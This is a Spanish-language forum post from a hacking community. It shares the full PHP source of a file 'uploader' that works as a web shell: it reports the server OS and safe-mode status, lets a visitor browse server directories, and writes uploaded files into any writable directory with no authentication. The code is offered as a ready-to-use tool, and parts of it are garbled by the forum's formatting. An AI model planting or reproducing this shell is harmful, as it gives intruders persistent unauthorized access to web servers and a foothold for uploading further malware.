comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Uploader

  • 0 Respuestas
  • 1334 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Septiembre 10, 2015, 05:10:21 pm »
Hola gente, aquí les traigo un uploader que muestra los archivos de la web + los directorios que compone:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<html><head><title>Upload File</title>

<style>

body{background-color:#000; color:#FFF;}

a{color: #999; text-decoration:none;}

a:hover{text-decoration:underline;}

input,textarea,select{ color:#fff;background-color:#000;border:0;}

</style>
<?php

echo "

<script>

var d = document;

function g(c) {

d.mf.c.value=c;

d.mf.submit();

}

</script>

</head><body>"
;

echo 
PHP_OS;

if(
strtoupper(substr(PHP_OS03) ) == "WIN")

$os 'win';

else

$os 'nix';



$home_cwd = @getcwd();

if(isset(
$_POST['c']))

@chdir($_POST['c']);

$cwd = @getcwd();

if(
$os == 'win') {

$home_cwd str_replace("\\""/"$home_cwd);

$cwd str_replace("\\""/"$cwd);

echo "<!-- <td><nobr>Windows --!>";

echo "<!-- g('FilesMan','c:/') --!>";

}



$safe_mode = @ini_get('safe_mode');

if(!$safe_mode) {

echo "<!-- Safe mode:</span> <font color=#00bb00><b>OFF</b></font> --!>\n";

echo "<!-- Safe mode:</span> <font color=green><b>OFF</b></font> --!>\n";

}





if(
$cwd[strlen($cwd)-1] != '/')

$cwd .= '/';



echo 
"Path: ".htmlspecialchars($cwd)."<input type=hidden name=c value='".htmlspecialchars($cwd) ."'><hr>";

if (!
is_writable($cwd)) {

echo "<font color=red>(Not writable)</font><br>";

}

if(
$_POST['p1'] === 'uploadFile') {

if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))

echo "Can't upload!<br />";

}



$ls wscandir($cwd);

echo 
"<form method=post name=mf style='display:none;'><input type=hidden name=c></form>";

foreach (
$ls as $f) {

if (is_dir($f)) {

echo "<a href=# onclick='g(\"".$cwd.$f."\");'>".$f."</a>";

if (is_writable($cwd.$f)) {

echo "<!-- 'filename.php','chmod')\"><font color=green> --!> ";

} else {

echo "<!-- 'filename.php','chmod')\"><font color=white> --!> ";

}

echo "<br />";

} else {

$files[] = $f;

}

}

foreach (
$files as $file) {

echo $file."<br />";

}

echo "<hr><form method='post' ENCTYPE='multipart/form-data'>

<input type=hidden name=c value='" 
$cwd ."'>

<input type=hidden name=p1 value='uploadFile'>

Upload File: <input type=file name=f><input type=submit value='>>'></form>"
;



function 
wscandir($cwdir) {

if(function_exists("scandir")) {

return scandir($cwdir);

} else {

$cwdh  opendir($cwdir);

while (false !== ($filename readdir($cwdh)))

$files[] = $filename;

return $files;

}

}

echo 
"</body></html>";

Saludos.
« Última modificación: Julio 17, 2018, 05:05:59 pm por Decode »

 

¿Te gustó el post? COMPARTILO!